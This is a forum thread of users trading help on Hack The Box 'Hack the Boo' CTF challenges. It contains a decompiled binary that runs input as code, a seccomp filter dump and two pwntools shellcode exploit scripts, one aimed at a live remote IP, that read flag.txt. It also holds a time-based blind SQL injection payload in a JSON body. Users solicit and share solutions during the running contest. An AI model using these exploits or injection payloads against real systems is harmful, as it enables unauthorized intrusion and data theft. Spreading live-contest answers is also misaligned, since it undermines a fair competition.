Return to forum

killerbee · October 25, 2022 at 9:56 AM

how to solve pwn and web '___'

lollole · October 25, 2022 at 9:56 AM

(October 24, 2022, 02:12 PM)Meep Wrote: Pwn challenge looks like shellcode.

  local_a8 = 0;
  local_a0 = 0;
  local_98 = 0;
  local_90 = 0;
  local_88 = 0;
  local_80 = 0;
  local_78 = 0;
  local_70 = 0;
  local_68 = 0;
  local_60 = 0;
  local_58 = 0;
  local_50 = 0;
  local_48 = 0;
  local_40 = 0;
  local_38 = 0;
  local_30 = 0;
  local_28 = 0;
  local_20 = 0;
  local_18 = 0;
  local_14 = 0;
  read(0,&local_a8,0x95);
  (*(code *)&local_a8)();

Also NX not set meaning its capable of it (no protection). Did not get it working yet.

any update for pwn?

Dariko · October 25, 2022 at 9:57 AM

3 days challenges plz give it a rest

dowloadpx · October 25, 2022 at 10:19 AM

very nice

urghyrex · October 25, 2022 at 10:21 AM

(October 24, 2022, 01:50 PM)Hacker2222 Wrote: plz discuss here

reversing challenge:
thanks @HTBContestant

well thanks for sharing hack the boo, i've been using htb since 2020, this one is perfect

mitas3c · October 25, 2022 at 10:24 AM

(October 24, 2022, 01:50 PM)Hacker2222 Wrote: plz discuss here

reversing challenge:
thanks @HTBContestant

thank you

keygen · October 25, 2022 at 10:35 AM

on web why am getting

{"message":"400 Bad Request"},

how do you guys append the payload on json body

example(just example)


{
"username":"admin"="admin" AND (SELECT 5424 FROM (SELECT(SLEEP(5)))OChx) AND "admin"="admin",
"password":"admin"
}

Dorsal3089 · October 25, 2022 at 11:00 AM

thxxxxx

xiorat89 · October 25, 2022 at 11:45 AM

(October 25, 2022, 02:34 AM)karhu Wrote: Still working on PWN. What I have so far:

Output from seccomp-tools dump ./pumpking

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
 0005: 0x15 0x04 0x00 0x00000000  if (A == read) goto 0010
 0006: 0x15 0x03 0x00 0x00000001  if (A == write) goto 0010
 0007: 0x15 0x02 0x00 0x0000000f  if (A == rt_sigreturn) goto 0010
 0008: 0x15 0x01 0x00 0x0000003c  if (A == exit) goto 0010
 0009: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x06 0x00 0x00 0x00000000  return KILL

I wrote this using pwntools, but it's not working:

from pwn import *

context.clear(arch="amd64")


shellcode = shellcraft.linux.openat(-1, "flag.txt")
shellcode1 = shellcraft.linux.read(3, 'rsp', 80)
shellcode2 = shellcraft.linux.write(1, 'rsp', 80)

def main():
    #print(asm(shellcode))
    io = remote("142.93.35.129", 30658)
    io.recvuntil(b"kids: ", timeout=1)
    print(io.recv())
    io.sendline(b"pumpk1ngRulez")
    io.recvuntil(b">> ", timeout=1)
    print(io.recv())
    io.send(asm(shellcode + shellcode1 + shellcode2))
    io.interactive()

if __name__ == "__main__":
    main()

If anyone has any hints, I'd really appreciate it.

Very close, you just needed to play with the file descriptors a bit it seems like

#!/usr/bin/python3

from pwn import *

context.update(arch='amd64', os='linux')
shellcode  = shellcraft.linux.openat(-1, "/home/ctf/flag.txt")
shellcode += shellcraft.linux.read(5, 'rsp', 50)
shellcode += shellcraft.linux.write(1, 'rsp', 50)
shellcode += shellcraft.exit(0)
# print(shellcode)

#p = process("./pumpking")
p = remote("127.0.0.1", 1337)
#gdb.attach(p, """
#b * king+261
#c""")

print(p.read())
p.sendline(b"pumpk1ngRulez")
print(p.read())
p.sendline(asm(shellcode))
p.interactive()

breachfotonme · October 25, 2022 at 11:52 AM

(October 24, 2022, 01:50 PM)Hacker2222 Wrote: plz discuss here

reversing challenge:
thanks @HTBContestant

thank you for this share